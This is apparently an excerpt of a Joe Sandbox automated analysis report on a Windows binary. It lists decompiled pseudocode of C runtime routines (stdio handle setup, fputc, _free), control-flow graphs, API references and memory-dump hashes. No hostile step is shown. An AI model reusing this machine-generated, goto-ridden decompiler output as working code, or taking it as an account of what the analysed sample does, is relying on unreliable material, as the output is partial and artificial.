



                                                0x00c2703f
                                                0x00c27044
                                                0x00c2704b
                                                0x00c2704e
                                                0x00c27060
                                                0x00c2706c
                                                0x00c27072
                                                0x00c27075
                                                0x00c27077
                                                0x00c2707f
                                                0x00c27080
                                                0x00c27086
                                                0x00c27087
                                                0x00c2708a
                                                0x00c2708c
                                                0x00c27092
                                                0x00c27092
                                                0x00c27098
                                                0x00c2709c
                                                0x00c2709e
                                                0x00c270a1
                                                0x00c270a3
                                                0x00c270a6
                                                0x00c270a9
                                                0x00c270a9
                                                0x00c270aa
                                                0x00c270ac
                                                0x00c270b2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c270b2
                                                0x00c270ba
                                                0x00c270bd
                                                0x00c270d1
                                                0x00c270d9
                                                0x00c270fd
                                                0x00c270db
                                                0x00c270db
                                                0x00c270e1
                                                0x00c270e6
                                                0x00000000
                                                0x00000000
                                                0x00c270e6
                                                0x00000000
                                                0x00c270e8
                                                0x00c270e8
                                                0x00c270eb
                                                0x00c270f1
                                                0x00c270f5
                                                0x00c270ff
                                                0x00c2710f

                                                APIs
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00C27548,?,00000000,00000000,?,00000000,00000000), ref: 00C270D1
                                                • GetLastError.KERNEL32(?,00C27548,?,00000000,00000000,?,00000000,00000000,00000000,?,00C40F78,00000010,00C1EFF8,00000000,00000000,00000000), ref: 00C270F7
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID:
                                                • API String ID: 442123175-0
                                                • Opcode ID: 037cde003dc8fa8c43b3d493041d78f01e7fb2d8e30774b0515f39166de6f7dc
                                                • Instruction ID: 7f5dbaabb67ed1fe8b2f59f901375f817efeb9b71702de46fce3ccb84b497df1
                                                • Opcode Fuzzy Hash: 037cde003dc8fa8c43b3d493041d78f01e7fb2d8e30774b0515f39166de6f7dc
                                                • Instruction Fuzzy Hash: 34219435A042299BCF19CF29DDC0ADDB7B5EB49301F1441A9EA06D7211D630EE86CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 413 c2465a-c2465f 414 c24661-c24679 413->414 415 c24687-c24690 414->415 416 c2467b-c2467f 414->416 417 c246a2 415->417 418 c24692-c24695 415->418 416->415 419 c24681-c24685 416->419 422 c246a4-c246b1 GetStdHandle 417->422 420 c24697-c2469c 418->420 421 c2469e-c246a0 418->421 423 c24700-c24704 419->423 420->422 421->422 425 c246b3-c246b5 422->425 426 c246c0 422->426 423->414 424 c2470a-c2470d 423->424 425->426 427 c246b7-c246be GetFileType 425->427 428 c246c2-c246c4 426->428 427->428 429 c246e2-c246f4 428->429 430 c246c6-c246cf 428->430 429->423 433 c246f6-c246f9 429->433 431 c246d1-c246d5 430->431 432 c246d7-c246da 430->432 431->423 432->423 434 c246dc-c246e0 432->434 433->423 434->423
                                                C-Code - Quality: 84%
                                                			E00C2465A() {
                                                				signed int _t20;
                                                				signed int _t22;
                                                				long _t23;
                                                				signed char _t25;
                                                				void* _t28;
                                                				signed int _t31;
                                                				void* _t33;
                                                
                                                				_t31 = 0;
                                                				do {
                                                					_t20 = _t31 & 0x0000003f;
                                                					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0xc99448 + (_t31 >> 6) * 4));
                                                					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
                                                						 *(_t33 + 0x28) = 0x81;
                                                						_t22 = _t31;
                                                						if(_t22 == 0) {
                                                							_push(0xfffffff6);
                                                						} else {
                                                							if(_t22 == 1) {
                                                								_push(0xfffffff5);
                                                							} else {
                                                								_push(0xfffffff4);
                                                							}
                                                						}
                                                						_pop(_t23);
                                                						_t28 = GetStdHandle(_t23);
                                                						if(_t28 == 0xffffffff || _t28 == 0) {
                                                							_t25 = 0;
                                                						} else {
                                                							_t25 = GetFileType(_t28); // executed
                                                						}
                                                						if(_t25 == 0) {
                                                							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                                                							 *(_t33 + 0x18) = 0xfffffffe;
                                                							_t20 =  *0xc992b8; // 0x16776a0
                                                							if(_t20 != 0) {
                                                								_t20 =  *(_t20 + _t31 * 4);
                                                								 *(_t20 + 0x10) = 0xfffffffe;
                                                							}
                                                						} else {
                                                							_t20 = _t25 & 0x000000ff;
                                                							 *(_t33 + 0x18) = _t28;
                                                							if(_t20 != 2) {
                                                								if(_t20 == 3) {
                                                									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
                                                								}
                                                							} else {
                                                								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                                                							}
                                                						}
                                                					} else {
                                                						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
                                                					}
                                                					_t31 = _t31 + 1;
                                                				} while (_t31 != 3);
                                                				return _t20;
                                                			}










                                                0x00c2465f
                                                0x00c24661
                                                0x00c24665
                                                0x00c2466e
                                                0x00c24679
                                                0x00c24689
                                                0x00c2468d
                                                0x00c24690
                                                0x00c246a2
                                                0x00c24692
                                                0x00c24695
                                                0x00c2469e
                                                0x00c24697
                                                0x00c2469a
                                                0x00c2469a
                                                0x00c24695
                                                0x00c246a4
                                                0x00c246ac
                                                0x00c246b1
                                                0x00c246c0
                                                0x00c246b7
                                                0x00c246b8
                                                0x00c246b8
                                                0x00c246c4
                                                0x00c246e2
                                                0x00c246e6
                                                0x00c246ed
                                                0x00c246f4
                                                0x00c246f6
                                                0x00c246f9
                                                0x00c246f9
                                                0x00c246c6
                                                0x00c246c6
                                                0x00c246c9
                                                0x00c246cf
                                                0x00c246da
                                                0x00c246dc
                                                0x00c246dc
                                                0x00c246d1
                                                0x00c246d1
                                                0x00c246d1
                                                0x00c246cf
                                                0x00c24681
                                                0x00c24681
                                                0x00c24681
                                                0x00c24700
                                                0x00c24701
                                                0x00c2470d

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 00C246A6
                                                • GetFileType.KERNELBASE(00000000), ref: 00C246B8
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileHandleType
                                                • String ID:
                                                • API String ID: 3000768030-0
                                                • Opcode ID: e7682bbb92ab0503b9f68fa89c3efc1ed7dd94b9b2f01c1a8435e2e6a183082b
                                                • Instruction ID: a97691ac74e290eb521bd549d34fed4b30613e33fd34bc2f75307a0d61cf19bd
                                                • Opcode Fuzzy Hash: e7682bbb92ab0503b9f68fa89c3efc1ed7dd94b9b2f01c1a8435e2e6a183082b
                                                • Instruction Fuzzy Hash: 1F11AF31204B718BC7384B3EBC8C6227A95AB53331B38071AE5B6879F1C730DA86D651
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 435 c20b3f-c20b46 436 c20b4b-c20b52 call c2acda call c2afce 435->436 437 c20b48-c20b4a 435->437 441 c20b57-c20b5b 436->441 442 c20b62-c20b6b call c20b92 441->442 443 c20b5d-c20b60 441->443 448 c20b72-c20b79 442->448 449 c20b6d-c20b70 442->449 444 c20b86-c20b91 call c22f9f 443->444 451 c20b7e-c20b85 call c22f9f 448->451 449->451 451->444
                                                C-Code - Quality: 92%
                                                			E00C20B3F(void* __ebx, void* __ecx) {
                                                				void* _t2;
                                                				intOrPtr _t3;
                                                				signed int _t13;
                                                				signed int _t14;
                                                
                                                				if( *0xc993d8 == 0) {
                                                					_push(_t13);
                                                					E00C2ACDA(__ebx); // executed
                                                					_t2 = E00C2AFCE(__ecx); // executed
                                                					_t17 = _t2;
                                                					if(_t2 != 0) {
                                                						_t3 = E00C20B92(__ebx, _t17);
                                                						if(_t3 != 0) {
                                                							 *0xc993e4 = _t3;
                                                							_t14 = 0;
                                                							 *0xc993d8 = _t3;
                                                						} else {
                                                							_t14 = _t13 | 0xffffffff;
                                                						}
                                                						E00C22F9F(0);
                                                					} else {
                                                						_t14 = _t13 | 0xffffffff;
                                                					}
                                                					E00C22F9F(_t17);
                                                					return _t14;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}







                                                0x00c20b46
                                                0x00c20b4c
                                                0x00c20b4d
                                                0x00c20b52
                                                0x00c20b57
                                                0x00c20b5b
                                                0x00c20b63
                                                0x00c20b6b
                                                0x00c20b72
                                                0x00c20b77
                                                0x00c20b79
                                                0x00c20b6d
                                                0x00c20b6d
                                                0x00c20b6d
                                                0x00c20b80
                                                0x00c20b5d
                                                0x00c20b5d
                                                0x00c20b5d
                                                0x00c20b87
                                                0x00c20b91
                                                0x00c20b48
                                                0x00c20b4a
                                                0x00c20b4a

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 9cd0aa52d28638d4ef275731a534e9c9f2958a019d7f1759945ae2091ebc5984
                                                • Instruction ID: 5cb5c971d475a1b0e72db8590ed81b5c044ef1bddbeed7be6e08fed24e5aac0a
                                                • Opcode Fuzzy Hash: 9cd0aa52d28638d4ef275731a534e9c9f2958a019d7f1759945ae2091ebc5984
                                                • Instruction Fuzzy Hash: 1AE06526906A3057A331AF7E7C167AA16559B81379B32031BF434869F7DF7049417051
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 454 c1e0f0-c1e10f 455 c1e121-c1e132 call c2441e 454->455 456 c1e111-c1e11c call c1e0c0 454->456 462 c1e164 455->462 463 c1e134-c1e13e call c2441e 455->463 461 c1e20c-c1e218 call c17193 456->461 466 c1e166-c1e16b 462->466 463->462 472 c1e140-c1e162 call c2441e * 2 463->472 469 c1e171-c1e173 466->469 470 c1e1ff-c1e209 call c1e0c0 466->470 469->470 473 c1e179-c1e183 call c2441e 469->473 478 c1e20a-c1e20b 470->478 472->466 480 c1e1b3-c1e1b7 473->480 481 c1e185-c1e18f call c2441e 473->481 478->461 480->470 484 c1e1b9-c1e1d0 call c23308 480->484 481->480 488 c1e191-c1e1b1 call c2441e * 2 481->488 491 c1e1d2-c1e1d7 484->491 492 c1e1f8-c1e1fd 484->492 488->480 494 c1e1f2-c1e1f6 491->494 495 c1e1d9-c1e1e0 call c24445 491->495 492->478 494->478 498 c1e1e5-c1e1ea 495->498 498->492 500 c1e1ec-c1e1f0 498->500 500->494 500->495
                                                C-Code - Quality: 84%
                                                			E00C1E0F0(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                				signed int _v8;
                                                				char _v16;
                                                				char _v20;
                                                				void* __edi;
                                                				signed int _t23;
                                                				void* _t27;
                                                				void* _t28;
                                                				intOrPtr _t29;
                                                				intOrPtr _t30;
                                                				void* _t37;
                                                				signed int _t39;
                                                				signed int _t43;
                                                				void* _t48;
                                                				void* _t68;
                                                				void* _t71;
                                                				signed int _t76;
                                                
                                                				_t70 = __esi;
                                                				_t68 = __edx;
                                                				_t47 = __ebx;
                                                				_t23 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t23 ^ _t76;
                                                				_t69 = _a8;
                                                				if(( *(_a8 + 0xc) >> 0x0000000c & 0x00000001) == 0) {
                                                					_push(__ebx);
                                                					_push(__esi);
                                                					_t27 = E00C2441E(_t69);
                                                					_t48 = 0xc42260;
                                                					if(_t27 == 0xffffffff || E00C2441E(_t69) == 0xfffffffe) {
                                                						_t28 = _t48;
                                                					} else {
                                                						_t43 = E00C2441E(_t69);
                                                						_t28 =  *((intOrPtr*)(0xc99448 + (_t43 >> 6) * 4)) + (E00C2441E(_t69) & 0x0000003f) * 0x38;
                                                					}
                                                					_t9 = _t28 + 0x29; // 0xa0a0a00
                                                					_t29 =  *_t9;
                                                					if(_t29 == 2 || _t29 == 1) {
                                                						L18:
                                                						_t30 = E00C1E0C0(_a4, _t69);
                                                					} else {
                                                						if(E00C2441E(_t69) != 0xffffffff && E00C2441E(_t69) != 0xfffffffe) {
                                                							_t39 = E00C2441E(_t69);
                                                							_t48 =  *((intOrPtr*)(0xc99448 + (_t39 >> 6) * 4)) + (E00C2441E(_t69) & 0x0000003f) * 0x38;
                                                						}
                                                						if( *((char*)(_t48 + 0x28)) >= 0) {
                                                							goto L18;
                                                						} else {
                                                							if(E00C23308( &_v20,  &_v16, 5, _a4) != 0) {
                                                								L17:
                                                								_t30 = 0xffff;
                                                							} else {
                                                								_t71 = 0;
                                                								if(_v20 <= 0) {
                                                									L16:
                                                									_t30 = _a4;
                                                								} else {
                                                									while(1) {
                                                										_t37 = E00C24445( *((char*)(_t76 + _t71 - 0xc)), _t69); // executed
                                                										if(_t37 == 0xffffffff) {
                                                											goto L17;
                                                										}
                                                										_t71 = _t71 + 1;
                                                										if(_t71 < _v20) {
                                                											continue;
                                                										} else {
                                                											goto L16;
                                                										}
                                                										goto L19;
                                                									}
                                                									goto L17;
                                                								}
                                                							}
                                                						}
                                                					}
                                                					L19:
                                                					_pop(_t70);
                                                					_pop(_t47);
                                                				} else {
                                                					_t30 = E00C1E0C0(_a4, _t69);
                                                				}
                                                				return E00C17193(_t30, _t47, _v8 ^ _t76, _t68, _t69, _t70);
                                                			}



















                                                0x00c1e0f0
                                                0x00c1e0f0
                                                0x00c1e0f0
                                                0x00c1e0f8
                                                0x00c1e0ff
                                                0x00c1e103
                                                0x00c1e10f
                                                0x00c1e121
                                                0x00c1e122
                                                0x00c1e124
                                                0x00c1e129
                                                0x00c1e132
                                                0x00c1e164
                                                0x00c1e140
                                                0x00c1e141
                                                0x00c1e160
                                                0x00c1e160
                                                0x00c1e166
                                                0x00c1e166
                                                0x00c1e16b
                                                0x00c1e1ff
                                                0x00c1e203
                                                0x00c1e179
                                                0x00c1e183
                                                0x00c1e192
                                                0x00c1e1b1
                                                0x00c1e1b1
                                                0x00c1e1b7
                                                0x00000000
                                                0x00c1e1b9
                                                0x00c1e1d0
                                                0x00c1e1f8
                                                0x00c1e1f8
                                                0x00c1e1d2
                                                0x00c1e1d2
                                                0x00c1e1d7
                                                0x00c1e1f2
                                                0x00c1e1f2
                                                0x00c1e1d9
                                                0x00c1e1d9
                                                0x00c1e1e0
                                                0x00c1e1ea
                                                0x00000000
                                                0x00000000
                                                0x00c1e1ec
                                                0x00c1e1f0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1e1f0
                                                0x00000000
                                                0x00c1e1d9
                                                0x00c1e1d7
                                                0x00c1e1d0
                                                0x00c1e1b7
                                                0x00c1e20a
                                                0x00c1e20a
                                                0x00c1e20b
                                                0x00c1e111
                                                0x00c1e115
                                                0x00c1e11b
                                                0x00c1e218

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __cftof
                                                • String ID:
                                                • API String ID: 1622813385-0
                                                • Opcode ID: 807275ab0178f468f99aa9afde1962e6788f8f67ac22a344909ef482f5882cd5
                                                • Instruction ID: 92e3d732b5ac4ae224115856a86932c8487200c4886033f3e2024dbfa7cd6ceb
                                                • Opcode Fuzzy Hash: 807275ab0178f468f99aa9afde1962e6788f8f67ac22a344909ef482f5882cd5
                                                • Instruction Fuzzy Hash: 0F31F6325041747AC7187628AC46AFE77689E47B30734026AFC34DB4D2EA70D9C3B691
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 501 c16462-c16481 502 c16483-c16485 501->502 503 c16487-c1648f 501->503 504 c164e3-c164f0 call c17193 502->504 505 c16491-c1649b 503->505 506 c164b4-c164b8 503->506 505->506 508 c1649d-c164af 505->508 509 c164ba-c164c9 call c160e0 506->509 510 c164dd 506->510 513 c1656a-c1656d 508->513 516 c164f3-c16528 509->516 517 c164cb-c164ce 509->517 511 c164e2 510->511 511->504 513->511 523 c1652a-c1652d 516->523 524 c1653d-c16545 516->524 518 c164cf call c1594d 517->518 521 c164d4-c164db 518->521 521->510 521->511 523->524 525 c1652f-c16533 523->525 526 c16547-c16558 call c1f06c 524->526 527 c1655a-c16564 524->527 525->510 528 c16535-c1653b 525->528 526->510 526->527 527->510 527->513 528->518
                                                C-Code - Quality: 48%
                                                			E00C16462(void* __ecx, signed int* __edx, void* __esi, signed short _a4) {
                                                				signed int _v8;
                                                				char _v40;
                                                				char _v42;
                                                				signed short _v44;
                                                				signed int _v48;
                                                				char _v52;
                                                				char _v56;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed int _t33;
                                                				signed int _t37;
                                                				signed int _t40;
                                                				signed int _t51;
                                                				void* _t54;
                                                				signed int _t55;
                                                				signed int _t58;
                                                				signed short _t60;
                                                				signed int _t62;
                                                				signed int* _t72;
                                                				void* _t73;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				signed int _t79;
                                                				signed int _t80;
                                                
                                                				_t74 = __esi;
                                                				_t72 = __edx;
                                                				_t33 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t33 ^ _t80;
                                                				_t60 = _a4;
                                                				_t73 = __ecx;
                                                				if(0xffff != _t60) {
                                                					_push(__esi);
                                                					_t62 =  *( *(__ecx + 0x20));
                                                					__eflags = _t62;
                                                					if(_t62 == 0) {
                                                						L5:
                                                						__eflags =  *(_t73 + 0x4c);
                                                						if( *(_t73 + 0x4c) == 0) {
                                                							L9:
                                                							_t37 = 0xffff;
                                                						} else {
                                                							E00C160E0(_t73);
                                                							_t40 =  *(_t73 + 0x38);
                                                							_v48 = _t40;
                                                							__eflags = _t40;
                                                							if(__eflags != 0) {
                                                								_v44 = _t60;
                                                								 *0xc34138(_t73 + 0x40,  &_v44,  &_v42,  &_v56,  &_v40,  &_v8,  &_v52);
                                                								_t51 =  *((intOrPtr*)( *((intOrPtr*)( *_t40 + 0x1c))))();
                                                								__eflags = _t51;
                                                								if(_t51 == 0) {
                                                									L16:
                                                									_t77 = _v52 -  &_v40;
                                                									__eflags = _t77;
                                                									if(_t77 == 0) {
                                                										L18:
                                                										 *((char*)(_t73 + 0x3e)) = 1;
                                                										__eflags = _v56 -  &_v44;
                                                										if(_v56 ==  &_v44) {
                                                											goto L9;
                                                										} else {
                                                											goto L19;
                                                										}
                                                									} else {
                                                										_t54 = E00C1F06C(_t60, _t73, _t77,  &_v40, 1, _t77,  *(_t73 + 0x4c));
                                                										__eflags = _t77 - _t54;
                                                										if(_t77 != _t54) {
                                                											goto L9;
                                                										} else {
                                                											goto L18;
                                                										}
                                                									}
                                                								} else {
                                                									_t55 = _t51 - 1;
                                                									__eflags = _t55;
                                                									if(_t55 == 0) {
                                                										goto L16;
                                                									} else {
                                                										__eflags = _t55;
                                                										if(__eflags != 0) {
                                                											goto L9;
                                                										} else {
                                                											_push( *(_t73 + 0x4c));
                                                											_push(_v44);
                                                											goto L8;
                                                										}
                                                									}
                                                								}
                                                								L20:
                                                							} else {
                                                								_push( *(_t73 + 0x4c));
                                                								_push(_t60); // executed
                                                								L8:
                                                								_t58 = E00C1594D(__eflags); // executed
                                                								__eflags = _t58;
                                                								_t37 = _t60 & 0x0000ffff;
                                                								if(_t58 == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_t72 =  *(__ecx + 0x30);
                                                						_t78 =  *_t72;
                                                						__eflags = _t62 - _t62 + _t78 * 2;
                                                						if(_t62 >= _t62 + _t78 * 2) {
                                                							goto L5;
                                                						} else {
                                                							 *_t72 = _t78 - 1;
                                                							_t72 =  *(__ecx + 0x20);
                                                							_t79 =  *_t72;
                                                							 *_t72 = _t79 + 2;
                                                							 *_t79 = _t60;
                                                							L19:
                                                							_t37 = _t60;
                                                						}
                                                					}
                                                					_pop(_t74);
                                                				} else {
                                                					_t37 = 0;
                                                				}
                                                				return E00C17193(_t37, _t60, _v8 ^ _t80, _t72, _t73, _t74);
                                                				goto L20;
                                                			}



























                                                0x00c16462
                                                0x00c16462
                                                0x00c16468
                                                0x00c1646f
                                                0x00c16473
                                                0x00c1647c
                                                0x00c16481
                                                0x00c1648a
                                                0x00c1648b
                                                0x00c1648d
                                                0x00c1648f
                                                0x00c164b4
                                                0x00c164b4
                                                0x00c164b8
                                                0x00c164dd
                                                0x00c164dd
                                                0x00c164ba
                                                0x00c164bc
                                                0x00c164c1
                                                0x00c164c4
                                                0x00c164c7
                                                0x00c164c9
                                                0x00c164f3
                                                0x00c1651a
                                                0x00c16525
                                                0x00c16525
                                                0x00c16528
                                                0x00c1653d
                                                0x00c16543
                                                0x00c16543
                                                0x00c16545
                                                0x00c1655a
                                                0x00c1655d
                                                0x00c16561
                                                0x00c16564
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c16547
                                                0x00c1654e
                                                0x00c16556
                                                0x00c16558
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c16558
                                                0x00c1652a
                                                0x00c1652a
                                                0x00c1652a
                                                0x00c1652d
                                                0x00000000
                                                0x00c1652f
                                                0x00c16530
                                                0x00c16533
                                                0x00000000
                                                0x00c16535
                                                0x00c16535
                                                0x00c16538
                                                0x00000000
                                                0x00c16538
                                                0x00c16533
                                                0x00c1652d
                                                0x00000000
                                                0x00c164cb
                                                0x00c164cb
                                                0x00c164ce
                                                0x00c164cf
                                                0x00c164cf
                                                0x00c164d5
                                                0x00c164d7
                                                0x00c164db
                                                0x00000000
                                                0x00000000
                                                0x00c164db
                                                0x00c164c9
                                                0x00c16491
                                                0x00c16491
                                                0x00c16494
                                                0x00c16499
                                                0x00c1649b
                                                0x00000000
                                                0x00c1649d
                                                0x00c164a0
                                                0x00c164a2
                                                0x00c164a5
                                                0x00c164aa
                                                0x00c164ac
                                                0x00c1656a
                                                0x00c1656a
                                                0x00c1656a
                                                0x00c1649b
                                                0x00c164e2
                                                0x00c16483
                                                0x00c16483
                                                0x00c16483
                                                0x00c164f0
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Fputc
                                                • String ID:
                                                • API String ID: 3078413507-0
                                                • Opcode ID: a8d2ea8f95dd45993a810b97621e52ee88f1e9d8b5f85da5000928c13e7738ce
                                                • Instruction ID: 1813560b185eb4eeac154ffba91b8b10840d3904d0087dff567dae0b7264ed6c
                                                • Opcode Fuzzy Hash: a8d2ea8f95dd45993a810b97621e52ee88f1e9d8b5f85da5000928c13e7738ce
                                                • Instruction Fuzzy Hash: 5E31D23290011AEFCF14CFA8C4409EEB7B9FF1A314B14416AE502E3640EB31EE94EB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 531 c2b3eb-c2b3f8 call c22f42 533 c2b3fd-c2b408 531->533 534 c2b40a-c2b40c 533->534 535 c2b40e-c2b416 533->535 536 c2b459-c2b465 call c22f9f 534->536 535->536 537 c2b418-c2b41c 535->537 538 c2b41e-c2b453 call c257de 537->538 543 c2b455-c2b458 538->543 543->536
                                                C-Code - Quality: 95%
                                                			E00C2B3EB(void* __edi, void* __eflags) {
                                                				intOrPtr _v12;
                                                				char _t17;
                                                				void* _t18;
                                                				intOrPtr* _t32;
                                                				char _t35;
                                                				void* _t37;
                                                
                                                				_push(_t27);
                                                				_t17 = E00C22F42(0x40, 0x38); // executed
                                                				_t35 = _t17;
                                                				_v12 = _t35;
                                                				if(_t35 != 0) {
                                                					_t2 = _t35 + 0xe00; // 0xe00
                                                					_t18 = _t2;
                                                					__eflags = _t35 - _t18;
                                                					if(__eflags != 0) {
                                                						_t3 = _t35 + 0x20; // 0x20
                                                						_t32 = _t3;
                                                						_t37 = _t18;
                                                						do {
                                                							_t4 = _t32 - 0x20; // 0x0
                                                							E00C257DE(__eflags, _t4, 0xfa0, 0);
                                                							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
                                                							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
                                                							 *_t32 = 0;
                                                							_t32 = _t32 + 0x38;
                                                							 *((intOrPtr*)(_t32 - 0x34)) = 0;
                                                							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
                                                							 *((char*)(_t32 - 0x2c)) = 0xa;
                                                							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
                                                							 *((char*)(_t32 - 0x26)) = 0;
                                                							__eflags = _t32 - 0x20 - _t37;
                                                						} while (__eflags != 0);
                                                						_t35 = _v12;
                                                					}
                                                				} else {
                                                					_t35 = 0;
                                                				}
                                                				E00C22F9F(0);
                                                				return _t35;
                                                			}









                                                0x00c2b3f1
                                                0x00c2b3f8
                                                0x00c2b3fd
                                                0x00c2b401
                                                0x00c2b408
                                                0x00c2b40e
                                                0x00c2b40e
                                                0x00c2b414
                                                0x00c2b416
                                                0x00c2b419
                                                0x00c2b419
                                                0x00c2b41c
                                                0x00c2b41e
                                                0x00c2b424
                                                0x00c2b428
                                                0x00c2b42d
                                                0x00c2b431
                                                0x00c2b435
                                                0x00c2b437
                                                0x00c2b43a
                                                0x00c2b440
                                                0x00c2b447
                                                0x00c2b44b
                                                0x00c2b44e
                                                0x00c2b451
                                                0x00c2b451
                                                0x00c2b455
                                                0x00c2b458
                                                0x00c2b40a
                                                0x00c2b40a
